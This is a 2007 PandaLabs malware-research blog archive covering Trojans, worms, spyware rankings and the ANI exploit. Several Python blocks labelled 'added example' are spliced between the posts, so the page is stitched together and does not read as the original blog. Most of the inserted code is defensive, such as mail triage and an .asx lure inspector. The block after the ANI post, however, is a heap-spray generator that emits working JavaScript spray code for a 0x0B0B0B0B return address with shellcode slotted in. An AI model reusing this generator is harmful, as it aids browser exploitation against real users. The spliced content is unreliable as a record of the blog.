
PandaLabs Blog

This blog started in October 2006, and we will be providing further in-depth information about new malware, new technologies and new trends.

Articles

Quarterly Report January-March 2007
2007-05-07 13:12:00
We have just published the latest PandaLabs Quarterly Report. We have improved the presentation of the statistics, with the aim of expanding the information and making it easier to interpret, so that readers get a more precise picture of the size and complexity of the current malware situation. Enjoy it!
Fake Internet Explorer 7.0 Beta
2007-05-07 09:20:00
This weekend we have seen several spam messages sent in order to infect users with a new Trojan. It is being distributed as if it were an Internet Explorer 7.0 Beta update. The message is sent from a spoofed address, admin@microsoft.com, and its subject is "Internet Explorer 7.0 Beta". Once you open the message, you see the following picture: If you click on the image, a file named update.exe is downloaded, which is the Trojan itself (detected as Trj/Spammer.AAO).
Cybercrime... for sale (II)
2007-05-03 18:26:00
In this post we continue talking about the price of malware, focusing on the price of software (Trojans, joiners, etc.):
- Keylogger Teller 2.0: a typical keylogger; it uses stealth techniques and is quite complete: US$40.
- Webmoney Trojan: captures WebMoney accounts: US$500, but the first 100 buyers get it for US$400!!!
- WMT-spy: another Trojan to obtain WebMoney accounts, but much cheaper than the previous one (its creator publishes the results it obtains on VirusTotal): the executable US$5, updates US$5, the builder US$10. Text translated from Russian using Google:
- Snatch Trojan: we have already talked about this Trojan in a previous post. It steals passwords and has rootkit functionality: US$600.
- Limbo Trojan: I only mention the price, US$500. I have seen it on other sites on special offer for US$350. We will talk about this Trojan soon.
- FTP checker: a program to validate stolen FTP accounts. You load the list ...
April spyware list
2007-04-27 13:43:00
This month Adware/Gator regains first position, with only 75 more detections than Adware/Lop.
1: Adware/Gator
2: Adware/Lop
3: Application/MyWebSearch
4: Application/Winantivirus2006
5: Spyware/Virtumonde
6: Adware/SaveNow
Application/Winantivirus2006 moves two positions up, from 6th to 4th. This rogue antispyware is usually promoted by other adware or by banners on websites that simulate a fake scan of the system, which always finds threats; the user is then asked to purchase, for a modest price, a program to remove them. Spyware/Virtumonde rises from 9th to 5th. This malware continually displays banners for rogue antispyware and error-repair programs. Some versions also send information about the programs the user has installed on the computer. They also download the toolbar Application/VSToolbar. In 23rd position we find Adware/Spylocked, an adware that promotes Application/Spylocked. It is installed m...
Not without my Eula!!!
2007-04-26 11:58:00
On a website that uses exploits to infect, I have come across a piece of malware that installs a program with a EULA agreement without the user's consent. Here you have a video in the following link or via YouTube. The process is shown:
1 - EULA agreement: how a user would install the program with the EULA agreement.
2 - Without EULA agreement: how the malware installs the program with the EULA agreement without the user's awareness.
3 - Debugging: the process the malware follows to install it:
a) First, it drops a copy of the program with the EULA agreement, which is embedded in its code.
b) Then, it runs it.
c) It looks for certain window texts with the API function "FindWindow" in order to obtain the handles of those windows.
d) Once it has the handles, it hides the window using "ShowWindow", so that the infected user is hardly aware of what is being carried out.
e) It sends the necessary messages using "SendMessage" to those handles, faking the user's acceptance...
Cybercrime... for sale (I)
2007-04-23 17:23:00
You have probably wondered at some time or another why there is so much malware. As we have lately explained on so many occasions, most times it all comes down to money. However, this raises other questions: How do hackers make money out of programming malware? Where do they sell their creations? For how much? Who buys the malware? What for? Our investigation has taken a long time, not only due to the language barrier (the majority of this software and service sales in this sector ?the evil sector- comes from Russia and other countries in the area, which made us turn to our technicians in Russia and Ukraine for help), but also due to the many buy-and-sell forums out there and the great variety of products / services available. Some of the services on offer include: - DDoS attacks- Spam Hosting.- Hiding of executable files.- FTP accounts.- Mailing Lists.- ICQ numbers.- RapidShare accounts.- Online business accounts (mainly Russian).- Sale of Trojans.- Hiring of hackers? services. Fro...
W32/Spamta.WF.worm
2007-04-19 15:57:00
In the last few hours we have received a few hundred e-mails containing the worm Spamta.WF. The attached file has one of the following extensions: .bat, .cmd, .exe, .pif, .scr. The subject of the email is one of the following: "Error", "Good Day", "hello", "Mail Delivery System", "Mail Transaction Failed", "picture", "Server Report", "Status", "test". The worm is proactively detected by TruPrevent Technologies.
Artesimda.A
2007-04-18 11:58:00
Every day we discover a huge number of new Trojans. Almost all of them are crimeware related (stealing any kind of credentials, e-mail addresses, etc.). It is common for the hackers, some of them really lazy, to use different tools to carry out different actions instead of programming them into the Trojan's code. This is good for us, as we can spot suspicious behaviour when certain services or tools are running. Today I'm going to talk about a new Trojan we have just been dealing with that uses Windows' own features to take control of the infected computer. The Trojan is named Trj/Artesimda.A; it creates a new account in Windows XP whose user name is "Adminestrator" and whose password is "Pass3488585". This is what you would see if you were infected: It uses a rootkit to hide itself and it starts the Remote Desktop Help Session Manager service. As it steals information (such as the IP address) and has a local administrator user account ...
FakeImages
2007-04-16 10:44:00
I have just discovered a new kind of fakecodec. This time, instead of being related to codecs to watch videos, it is related to images; I have named it Adware/Image AccesActiveXObject. As with the fakecodecs, it offers to let us "enjoy" some porn images by installing an ActiveX control supposedly needed to watch them. What it really does is register a class, Imageactivexobject.Ñhl, that checks the website we are visiting, so if we are on that particular website it redirects the browser to a different one where we could see the photos. This is the part of the script where this is checked: In this case, when you click on the photos to watch them, a message appears saying that the domain has expired. Here you have a video where we show the installation process. See the demo in the following video (encoded with XviD) or via YouTube: Like most fakecodecs, it checks whether it is running on a virtual machine; if it is, it won't infect the computer. All the malware ...
Ani exploit plus Heap Spraying
2007-04-13 14:40:00
Today we have detected a server exploiting the latest ANI vulnerability combined with the well-known "heap spraying" technique. The .ani file triggers the vulnerability, but there is no shellcode inside it: the HTML page carries JavaScript code that fills the heap with as many copies of the payload as possible, until the value used to overwrite the return address after the stack overflow, in this case 0x0B0B0B0B, points into valid sprayed memory. The reason for using this technique instead of including the shellcode inside the .ani file is presumably to avoid the stack execution protection: this way the shellcode executes in the heap rather than on the stack. (Keep in mind that hardware DEP, where it is enabled for the browser process, marks heap pages non-executable too, so the spray only helps where DEP is not enforced; its more general benefit is that the attacker no longer needs a precise return address, since any address inside the sprayed region will do.) You can see the sprayed heap and the shellcode in the following image:
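The geometry behind the spray described above, as an added example (not the JavaScript from the malicious page and not PandaLabs code). It builds the sled the way browser exploits of the period did (an unescape("%u....%u....") literal doubled until it fills a block, shellcode appended), emits an equivalent JavaScript spray, and works out how many blocks are needed before the 0x0B0B0B0B return address lands in sprayed memory. The heap base address, the 1 MiB block size and the 16-byte placeholder shellcode are assumptions of the model, not values taken from the sample.

```python
"""Heap-spray geometry for a 0x0B0B0B0B return address (added example)."""
import struct

RET_ADDR = 0x0B0B0B0B            # return address chosen by the exploit on the page
BLOCK_SIZE = 0x100000            # bytes per sprayed block (assumption)
ASSUMED_HEAP_BASE = 0x02000000   # address where the spray is assumed to start (assumption)
SHELLCODE = b"\x90" * 16         # placeholder; the real shellcode is not on the page


def sled_unit_bytes(addr):
    """Raw bytes one "%uXXXX%uXXXX" pair produces in memory.

    JavaScript strings are UTF-16, so unescape("%u0b0b%u0b0b") gives two
    code units 0x0b0b stored little-endian as 0b 0b 0b 0b: the same bytes
    as the return address. On x86, "0B 0B" decodes as or ecx,[ebx], which
    is harmless enough to slide over, so the address doubles as the sled."""
    return struct.pack("<I", addr)


def js_unescape_literal(addr):
    """The %u-escaped literal that reproduces sled_unit_bytes(addr) in JS."""
    lo, hi = addr & 0xFFFF, (addr >> 16) & 0xFFFF
    return "%%u%04x%%u%04x" % (lo, hi)


def build_block(addr, shellcode=SHELLCODE, block_size=BLOCK_SIZE):
    """One sprayed block: sled grown by doubling (the JS idiom
    `while (sled.length < n) sled += sled`), truncated so that
    len(sled) + len(shellcode) == block_size, then the shellcode."""
    sled = sled_unit_bytes(addr)
    while len(sled) < block_size:
        sled += sled
    return sled[: block_size - len(shellcode)] + shellcode


def blocks_needed(addr, heap_base=ASSUMED_HEAP_BASE, block_size=BLOCK_SIZE):
    """Blocks to allocate so that `addr` is inside the sprayed region,
    assuming the blocks are laid out back to back from heap_base."""
    if addr < heap_base:
        raise ValueError("return address lies below the spray region")
    return (addr - heap_base) // block_size + 1


def lands_in_sled(addr, heap_base=ASSUMED_HEAP_BASE, block_size=BLOCK_SIZE,
                  shellcode=SHELLCODE):
    """True if the jump lands in the sled part of its block rather than in
    the shellcode or past the block, so execution slides into the payload."""
    offset = (addr - heap_base) % block_size
    return offset < block_size - len(shellcode)


def render_spray_js(addr, count, block_size=BLOCK_SIZE, shellcode=SHELLCODE):
    """Emit the JavaScript spray equivalent to the model above, for comparing
    against a captured page or reproducing the geometry in a lab."""
    if len(shellcode) % 2:
        raise ValueError("shellcode must be an even number of bytes for %u encoding")
    sc = "".join("%%u%04x" % (shellcode[i] | shellcode[i + 1] << 8)
                 for i in range(0, len(shellcode), 2))
    units = (block_size - len(shellcode)) // 2     # UTF-16 code units in the sled
    return (
        'var shellcode = unescape("%s");\n' % sc
        + 'var sled = unescape("%s");\n' % js_unescape_literal(addr)
        + "while (sled.length < %d) sled += sled;\n" % units
        + "sled = sled.substring(0, %d);\n" % units
        + "var spray = new Array();\n"
        + "for (var i = 0; i < %d; i++) spray[i] = sled + shellcode;\n" % count
    )


if __name__ == "__main__":
    n = blocks_needed(RET_ADDR)
    print("blocks needed:", n, "lands in sled:", lands_in_sled(RET_ADDR))
    print(render_spray_js(RET_ADDR, n))
```

The model treats the spray as contiguous and ignores the string headers the JavaScript engine adds to each allocation, so in practice the real exploit over-allocates and the sled must be long enough that a landing anywhere in the block still slides into the shellcode; lands_in_sled() is the check for that.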
Nurech.Z
2007-04-13 13:33:00
In the last few hours we have received several mails containing the worm Nurech.Z. To avoid detection, the worm comes in a .zip file attached to the email. In addition, a password is needed to open the .zip, which makes detection by email filters even more complicated. Instead of being given in the body of the message, the password is included in a .gif file. This is not a very new technique, as multiple variants of Bagle have been using it for a long time. The subject of the email varies, but it usually warns of the presence of malware on the PC. Some examples are: "Virus Alert!", "Worm Alert!", "Spyware Alert!". The worm is proactively detected by TruPrevent Technologies. This is the image that appears in the .gif file: The worm drops a couple of rootkits that will try to complicate our lives. The first one searches for e-mail addresses on the computer, creates the .GIF image and, in addition, allows spam to be sent. The second hides the worm to make its...
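A mail-gateway check for the two attachment patterns described on this page, the Spamta.WF bare executables (.bat/.cmd/.exe/.pif/.scr under the subjects listed in that post) and the Nurech.Z password-protected .zip with a .gif carrying the password under an "... Alert!" subject. This is an added example, not PandaLabs code; the messages and the zip archives it checks are constructed inside the block. The zip inspection never extracts anything: it only reads the central directory, where bit 0 of the general-purpose flag marks an encrypted entry.

```python
"""Triage e-mail attachments for encrypted zips and bare executables (added example)."""
import io
import struct
import zipfile

EXEC_EXT = {".bat", ".cmd", ".exe", ".pif", ".scr"}            # from the Spamta.WF post
ALERT_SUBJECTS = {"virus alert!", "worm alert!", "spyware alert!"}  # from the Nurech.Z post
SPAMTA_SUBJECTS = {"error", "good day", "hello", "mail delivery system",
                   "mail transaction failed", "picture", "server report",
                   "status", "test"}
IMAGE_EXT = {".gif", ".jpg", ".jpeg", ".png"}


def ext_of(name):
    """Lower-case extension including the dot, or '' if there is none."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def zip_findings(data):
    """Inspect a zip without extracting it. ZipInfo.flag_bits comes from the
    central directory; bit 0 set means the entry is encrypted."""
    findings = set()
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x1:
                    findings.add("encrypted-zip-entry")
                if ext_of(info.filename) in EXEC_EXT:
                    findings.add("executable-in-zip")
    except zipfile.BadZipFile:
        findings.add("malformed-zip")
    return findings


def triage_message(subject, attachments):
    """attachments: list of (filename, bytes). Returns the set of reasons to
    quarantine the message; an empty set means nothing matched."""
    reasons = set()
    subj = subject.strip().lower()
    if subj in ALERT_SUBJECTS or subj in SPAMTA_SUBJECTS:
        reasons.add("known-worm-subject")
    has_image = any(ext_of(n) in IMAGE_EXT for n, _ in attachments)
    for name, data in attachments:
        ext = ext_of(name)
        if ext in EXEC_EXT:
            reasons.add("executable-attachment")
        elif ext == ".zip":
            found = zip_findings(data)
            reasons |= found
            # Nurech.Z pattern: the password for the archive travels in an image
            if "encrypted-zip-entry" in found and has_image:
                reasons.add("password-likely-in-image")
    return reasons


def build_zip_sample(name, payload, encrypted=False):
    """Construct a small zip for testing (constructed sample, not a real worm).
    Python cannot write encrypted zips, so for the encrypted case we set
    bit 0 of the flag field in both the local header (offset 6) and the
    central directory entry (offset 8), which is what a gateway sees."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, payload)
    data = bytearray(buf.getvalue())
    if encrypted:
        for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = data.find(sig)
            flags, = struct.unpack_from("<H", data, pos + off)
            struct.pack_into("<H", data, pos + off, flags | 0x1)
    return bytes(data)


if __name__ == "__main__":
    worm = build_zip_sample("update.exe", b"MZ" + b"\0" * 30, encrypted=True)
    print(triage_message("Worm Alert!", [("photo.gif", b"GIF89a"), ("file.zip", worm)]))
    print(triage_message("Mail Delivery System", [("body.scr", b"MZ")]))
```

The subject lists are only what the two posts quote, so treat them as seeds for a local feed rather than a complete rule; the structural checks (encrypted archive plus image, executable inside an archive) are the ones that survive the next variant.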
Trojan Snatch installed in a lot of malware servers
2007-04-04 10:24:00
Lately I've been coming across several websites that infect computers with the Trojan Trj/Snatch by using exploits. This malware not only monitors the passwords entered on the websites the user visits, but also has rootkit functionality to remain hidden. Like most malware kits that are for sale, it consists of a component that generates the server files with which it infects, and of a web component, usually hosted on a server, where the websites to monitor are configured and where the information harvested from the infected computers is received. The author of this malware can access it via the web to configure the data. This is the login screen that is usually displayed: These are the URLs that the Trojan is monitoring, from 3 different servers: So the attacker doesn't need to change the Trojan in order to update the entities being monitored; changing the URL list on the server is enough.
ANI vulnerability and malware researchers... be careful
2007-04-02 09:30:00
Last week (Thursday and Friday) was very hard for all malware researchers, working on the "new" ANI threat. A lot of conflicting information was released: "Yes, it's the same MS05-002 issue", "No, it's not the same issue...", "It's a user32.dll fault, but probably it's only an Outlook and IE issue...". What is really true? We spent last Friday analysing the vulnerability and no, it's not just an Outlook/IE issue. If you are a malware researcher (or not) and you usually use WinHex, you should be careful. The sample we were analysing tried to download an executable (wincf.exe) from http://22x.x.x.189/wincf.exe. By now the file has been deleted from the site, but we changed the URL in order to see if the exploit works, and it really works great, fast, and with WinHex..... What? Yes, we are not crazy. We were as surprised as you. See the demo in the following video (encoded with XviD [870k]) or via YouTube: It's time for WinHex's reverse engineer to disc...
March Spyware list
2007-03-30 13:31:00
The first six positions of the March top ten are the same as the previous month:
1: Adware/Lop
2: Adware/Gator
3: Application/MyWebSearch
4: Adware/SaveNow
5: Adware/nCase
6: Application/Winantivirus2006
The most widespread fakecodec variant at the moment, Adware/VideoActiveXObject, rises from 8th to 7th position. Spyware/Virtumonde rises from 17th to 9th. This malware continually displays banners for rogue antispyware and error-repair programs. Some versions also send information about the programs the user has installed on the computer. They also download the toolbar Application/VSToolbar, which is in 38th position. Adware/NaviPromo rises from 35th to 27th. It is an adware that promotes dialers and uses rootkit functionality to go unnoticed. Trj/Torpig.A takes 37th position. The Trj/Torpig and Trj/Sinowal families are very similar. We explained the techniques used by Trj/Sin...
A "new" ANI vulnerability in the wild
2007-03-30 08:50:00
It's real, it's not déjà vu. Yesterday, March 29, a new 0-day exploit using the ANI file format was discovered in the wild. The vulnerability is due to the way Microsoft Windows handles animated cursors. Microsoft has released an advisory. Affected systems include Windows 2000 SP4, XP SP2, Server 2003 and Vista. Animated cursors embedded in web pages or emails can be used to exploit it, so be careful with the emails you receive these days. Internet Explorer 7 on Vista with Protected Mode is protected from active exploitation, but Outlook is vulnerable. This vulnerability looks like the old ANI vulnerability (MS05-002) and probably exploits the same flaw with another technique: Microsoft released a patch for MS05-002, but it did not fix the underlying cause, leaving a way to exploit it again.
A fast and easy way to identify a system in a local network
2007-03-22 09:34:00
We know of tools and techniques for remote OS detection via TCP/IP stack fingerprinting: nmap, Queso, p0f, ... These tools use advanced techniques to identify the OS of a remote system and they are really good. But sometimes we can use an easier method to identify the OS (only the OS family: Linux, Windows, ... not the version: XP, Vista, 2K, Debian, RedHat, ...), and only on our local network. A few days ago I was writing a bash script to create directories with non-alphanumeric characters, to test the behaviour of Panda technologies with these unusual directory names. Linux allows directory and file names with characters that are not allowed in Windows. If we try to use some of these characters (*, ?, ") in a folder or file name in Windows, we get an error message: But Linux allows some of them: What happens if we have a shared folder on a Linux system (via Samba) and we map it as a network drive in Windows? With Explorer, cmd or a Cygwin shell it's not possible to create a di...
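The inference behind the post above, as an added example (not the bash script the author mentions): classify the filesystem behind a directory, for instance a mapped Samba share, as Unix-like from the names it already holds, using the fact that Windows can never create an entry containing the characters the post mentions (*, ?, ") or the other Win32 name restrictions; and, where a client allows it, by trying to create such a name. The directory listings in the test are constructed; probe_in_tempdir() runs the creation probe on a scratch directory of whatever machine executes it.

```python
"""Crude OS-family fingerprint from file names Windows cannot hold (added example)."""
import os
import tempfile

WINDOWS_RESERVED_CHARS = set('<>:"/\\|?*')        # never legal in a Win32 name component
WINDOWS_RESERVED_NAMES = {"CON", "PRN", "AUX", "NUL",
                          *("COM%d" % i for i in range(1, 10)),
                          *("LPT%d" % i for i in range(1, 10))}


def invalid_on_windows(name):
    """True if Win32 would refuse to create a directory entry with this name."""
    if any(c in WINDOWS_RESERVED_CHARS or ord(c) < 32 for c in name):
        return True
    if name != name.rstrip(" ."):          # Win32 strips trailing dots and spaces
        return True
    stem = name.split(".", 1)[0].upper()   # "con.txt" is reserved as well
    return stem in WINDOWS_RESERVED_NAMES


def guess_os_from_listing(names):
    """Return ("unix-like", hits) when at least one entry could not exist on a
    Windows filesystem, otherwise ("inconclusive", []): a Unix host may simply
    not contain such names yet, so their absence proves nothing."""
    hits = sorted(n for n in names if invalid_on_windows(n))
    return ("unix-like", hits) if hits else ("inconclusive", hits)


def probe_by_creation(path):
    """Try to create and remove a directory whose name contains '?' under path.
    Success means a Unix-like filesystem behind that path. A failure is only
    "rejected": on a Windows client the rejection comes from the client's own
    name rules even when the share is Samba, which is the limitation the post
    runs into with Explorer, cmd and cygwin."""
    probe = os.path.join(path, "pandalabs-probe-?")
    try:
        os.mkdir(probe)
    except OSError:
        return "rejected"
    os.rmdir(probe)
    return "unix-like"


def probe_in_tempdir():
    """Run the creation probe on a fresh scratch directory on this machine."""
    with tempfile.TemporaryDirectory() as tmp:
        return probe_by_creation(tmp)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    print(guess_os_from_listing(os.listdir(target)))
    print(probe_by_creation(target))
```

Run it against the mapped drive letter or a UNC path. The listing check is the one that works from a Windows client, because the SMB server returns the names even though the client cannot open them; the creation probe is reliable only from a client whose own name rules are permissive.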
Insecure features : should AV companies detect them?
2007-03-20 13:39:00
These days we have been analysing one of the latest MySpace threats, JS/MySpace.A, which uses an interesting QuickTime feature: HREF Tracks. A deep analysis of this malware is available at Didier Stevens' blog. Abusing HREF Tracks was first documented by pdp at the GNUCITIZEN blog; later the MoAB project showed how to exploit them in conjunction with other vulnerabilities that allowed attackers to gain remote code execution. The end of the story is as follows: Apple has finally removed JavaScript support in QuickTime as of version 7.1.5. But that's not the end of it. I still remember a very similar case in which a feature became a vulnerability and we ended up adding generic detections for a legal and documented use of the WMF file format, though I don't think anybody was really using it. So I wonder, and I ask you: should we add generic detections for file formats that support insecure features? If we do so, we may stop malware, but what can we say to a hypothetical cu...
Sex in ASCII
2007-03-14 12:05:00
We have seen spam using ASCII art to avoid detection by antispam filters. Most of the time they try to show different words (Viagra, etc.) using this technique, but this is the first time I have seen them showing a picture. It is not a very high quality one, but I've tried it against several antispam filters and they were all fooled: This spam is just an invitation from a one-night-stand friend and it is in Japanese; we took it from one of the spamtraps we have at Panda Research.
AntiVirus Trojan?
2007-03-10 02:51:04
We have seen rogue antispyware for quite a long time; there is a list of these kinds of "programs" on the Spywarewarrior site. We have discovered something similar, but this time its aim is not to earn money but to deliberately annoy users. It has an installation wizard, as if it were a normal software program. However, when you install it, it performs the following actions: disables the Start button, the Run and Find options, the Control Panel, Windows Update, the context menus, the notification area and the Task Manager, and hides the clock, among other actions. It also runs Windows Pinball, the only "funny" thing it does. But don't get your hopes up: just after that, it restarts the computer... Finally, it also creates a scheduled task to restart the computer every three hours (it sleeps at night, as the task is not executed from 0:00 to 6:00). You can download a video of this Trojan in action by clicking here. All the information abo...
February Spyware List
2007-03-05 20:47:05
Today we are going to review our top spyware list.
1: Adware/Lop (up from 2nd)
2: Adware/Gator (down from 1st)
3: Application/MyWebSearch (=)
4: Adware/SaveNow (up from 7th)
5: Adware/nCase (up from 6th)
It is the first time that Adware/Gator has been ousted by another adware, Adware/Lop. As we explained in last month's list, this adware, which belongs to the company C2Media LTD, had reached second position in our ranking. Tenth position goes to Rootkit/Mhook, a rootkit mainly used by the Bagle family of worms to hide Bagle and go unnoticed on infected computers. This type of rootkit is used more and more by spyware. In fourteenth position is Trj/QQPass.JZ, a password-stealing Trojan that obtains passwords from the instant messaging program "Tencent QQ", which is very widespread in Asian countries. Application/DriveCleaner gains two positions, from last month's seventeenth to fi...
How to infect + 40.000 computers in 1 second?
2007-03-01 20:44:03
Yes, I know we should talk about how to protect computers, not about how to infect them, but... aren't you curious? We found a server managed by a hacker that controls more than 40.000 computers. Only yesterday he created a new Trojan and sent a command to all the zombies: download & run. This is not the typical IRC botnet but an HTTP-based botnet, so the hacker won't have any problem if there is a firewall on the computer. It was just a downloader Trojan that installed some malware on the infected computers: - A spammer Trojan (hey, this guy has 40.000+ PCs ready to send out spam and flood all of us!) - An adware (Adware/Bravesentry) that changes your desktop to black with big white letters saying that you are infected, and all the typical stuff. This adware installs a rogue antispyware (Application/Bravesentry) on the computer, a tool that keeps reporting that you are infected until you purchase it. Once you buy it, it leaves you alone. Th...
2006 PandaLabs Annual Report
2007-02-28 08:42:02
We have just published the brand new 2006 PandaLabs Annual Report; you can download it from here. Enjoy it!
A curious technique of social engineering
2007-02-23 08:38:06
We have recently detected many infections of Trj/Abox.A. The high number of infections is due to the curious social engineering technique it uses to deceive users. This malware sends email messages with an .asx file attached. The file's code can be recognised by the following tags:
TITLE "Codec not found", which deceives users into thinking that they do not have the right codec to watch the video.
REF HREF, the URL of the video that is played. It is actually a one-minute video with a black background, whose only purpose is to make users think they do not have the right codec.
MOREINFO HREF, the URL that is opened when the banner shown in the video is clicked.
This is what users see when they try to open the .asx file: When users are infected, it downloads a downloader-type Trojan (detected as Trj/Abox.A), which downloads via FTP 3 files that receive instructions from a server in order to send em...
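A small .asx inspector for the lure described above, as an added example (not the Trj/Abox.A sample and not PandaLabs code): it pulls the three tags the post names (TITLE, REF HREF, MOREINFO HREF) out of an .asx attachment and flags the combination of a "codec" title with a clickable MOREINFO link. The two .asx documents it checks are constructed; the example.invalid hosts are placeholders.

```python
"""Extract TITLE / REF HREF / MOREINFO HREF from .asx attachments (added example)."""
import re

TITLE_RE = re.compile(r"<\s*title\s*>(.*?)<\s*/\s*title\s*>", re.I | re.S)
REF_RE = re.compile(r"<\s*ref\b[^>]*?href\s*=\s*[\"']([^\"']*)[\"']", re.I)
MOREINFO_RE = re.compile(r"<\s*moreinfo\b[^>]*?href\s*=\s*[\"']([^\"']*)[\"']", re.I)
LURE_WORDS = ("codec",)          # the lure quoted in the post; extend with local observations
EXEC_EXT = ("exe", "scr", "pif", "bat", "cmd")

# Constructed sample reproducing the structure the post describes.
SAMPLE_ASX = """<ASX version="3.0">
  <TITLE>Codec not found</TITLE>
  <ENTRY>
    <REF HREF="http://video.example.invalid/clip.wmv" />
    <MOREINFO HREF="http://download.example.invalid/codec.exe" />
  </ENTRY>
</ASX>"""

# Constructed benign playlist for comparison.
BENIGN_ASX = """<ASX version="3.0">
  <TITLE>Company all-hands</TITLE>
  <ENTRY><REF HREF="mms://media.example.invalid/allhands.wmv" /></ENTRY>
</ASX>"""


def inspect_asx(text):
    """Return the titles, video references and MOREINFO links found, plus
    whether any title reads like a missing-codec lure."""
    titles = [t.strip() for t in TITLE_RE.findall(text)]
    return {
        "titles": titles,
        "refs": REF_RE.findall(text),
        "moreinfo": MOREINFO_RE.findall(text),
        "codec_lure": any(w in t.lower() for t in titles for w in LURE_WORDS),
    }


def executable_links(text):
    """Links in REF or MOREINFO that point straight at an executable."""
    info = inspect_asx(text)
    links = info["refs"] + info["moreinfo"]
    return [u for u in links if u.lower().rsplit(".", 1)[-1] in EXEC_EXT]


def is_suspicious(text):
    """Lure title plus a clickable MOREINFO link is the combination the post
    describes: the video only exists to make the user click the banner."""
    info = inspect_asx(text)
    return info["codec_lure"] and bool(info["moreinfo"])


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_ASX), ("benign", BENIGN_ASX)):
        print(label, is_suspicious(doc), executable_links(doc), inspect_asx(doc))
```

executable_links() looks only at the last path component, so a link that hides the executable behind a query string or a redirect will not be caught by it; is_suspicious() does not depend on that and is the check to rely on for this lure.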
Malware, Banks & Google Maps (II)
2007-02-21 14:35:07
It seems this hacker is pretty active: the Trojan tries to update itself and then downloads some SSLv2-encrypted packages, which seem to be the message body and e-mail addresses. Today we have intercepted phishing being sent out, and right now it is sending spam. Can you guess what it is about? Yes, you are right, it's Viagra. We can find some text hidden in the e-mail in order to evade antispam filters. The following text belongs to one of the messages:
Korea's development of nuclear weapons.weapons programs and rejoin the international he standoff over North Korea's nuclear weaponsboycott.involving China, Japan, Russia, the two Koreas and theBush said the United States will remain a reliable partner in liberalizing trade, confronting North Korea's midterm elections to anti-war, anti-free trade in Singaporelaundering.Asia will not diminish.good of their people, is to abandon its nuclear The six-nation talks stalled a year ago when North weapons programs and...
Malware, Banks & Google Maps
2007-02-20 20:33:05
Yesterday we detected a downloader that attracted media attention because it was spammed with some "curious" subjects:
# "Current Australia's Prime Minister survived a hear attack"
# "Prime Minister survived a heard attack"
# "The life of the Prime Minister is in grave danger"
There were a few thousand infections around the world. It downloaded all kinds of files, 6 of which were malware. Among them were a keylogger, a web server (installed on your computer to give the attacker complete access to all your drives), 2 Trojans (to block access to certain security and antivirus related websites) and another 2 Trojans that redirect traffic for some bank websites in order to steal information. It also used Google Maps to somehow locate the infected users. This may be useless, but curious anyway. Now, thanks to TruPrevent(R) proactive technologies, we have caught its little brother (it will surely be a huge family in ...
More fakecodecs!!!
2007-02-20 02:32:02
Lately we have noticed an increase in detections of fake codecs. They are supposed to be codecs that allow users to watch certain videos, usually for adults, but in fact they only register a key on the computer in order to check whether they have been installed before. If so, not only do they let users watch these videos, they also install certain malware on the computer. As can be seen in the following video, one of these fake codecs installs malware on the computer even though the EULA was never accepted. It can also be seen how Adware/MegaTds, which is installed and uses rootkit techniques to go unnoticed, redirects Internet searches to the websites the adware wants to promote. This is one of the different ways of earning money by means of malicious software (malware), what is known as crimeware. You can watch it here.
MS denies execution of IE7 if the executable file name isn't iexplore.exe
2007-02-16 02:30:01
Some days ago, while doing some research, we discovered a strange IE 7 behaviour or "feature". We were trying to execute a renamed IE 7 executable, but noticed that it always terminated without any system notification. After a basic debugging session of IE7, we discovered the code responsible. It is inside ieframe.dll on Windows XP: and in iertutil.dll on Windows Vista (ieframe.dll on Vista also has some code to "detect" it, inside the IsIexploreProcess function): As can be seen in the disassembly, this code tries to match the executable name against some hardcoded values: iexplore.exe, explorer.exe and ieuser.exe (on XP) and iexplore.exe, ieuser.exe, ieinstall.exe and iedw.exe (on Vista). If the name doesn't match, the process is killed. What's the reason for this "feature"? After some research, we noticed this could be derived from the inclusion of Protected Mode for Inte...
Wifi comments ( Update )
2007-02-14 14:28:02
We have received some comments on our last post. There we said: "2.- Use encryption WEP/WPA, something is better than nothing, although we know that these encryption systems can't stop an attack for more than 5 minutes; at least you make it harder." What we mean is that WEP is very weak and that you should use WPA instead. A good password with WPA and AES is strong enough. We have corrected the previous post to make it clear that we were talking about WEP.
Skype rumours
2007-02-09 14:25:02
Recently an article was published suggesting that Skype, the famous VoIP client, may be collecting some information from users' PCs; to be more specific, some details about the BIOS and the motherboard's serial number. Read it for full details. At the ASC, we have been working on some best-practice guidelines for the industry, in order to draw a line between what should be allowed and what shouldn't. These guidelines talk a lot about proper consent, which means that users should give explicit consent to what information is going to be gathered. Let's read the section about Consent and Control: "Users should be in control of their computers at all times. Anti-spyware vendors may evaluate the extent to which the software publisher has asked and received consent from the user before performing activities such as installation or uninstallation, or the collection, use or disclosure of personal information. For potentially unwanted technologies,...
Wifi comments
2007-02-09 14:25:02
Not long ago one of my colleagues told me a story which was quite funny. He was at home and one of his neighbours called him, asking if he was having problems with his Internet connection. My colleague told him that everything was working for him and that the only change he had made was to change the router's password. The other guy asked him for the password, as he was unable to connect. After a quite funny conversation, my colleague learned that this guy had been using his Wifi connection for a long time, more or less felt he had the right to use it, and blamed him for changing the password and preventing him from doing so. I was amazed by this story, so I decided to write a small guide.
Tips on securing a Wifi network
1.- Change the default password; it is amazing the number of devices which are still protected with the password provided in the manual, or something like admin, administrator, password, etc.
2.- Use encryption WEP/WPA...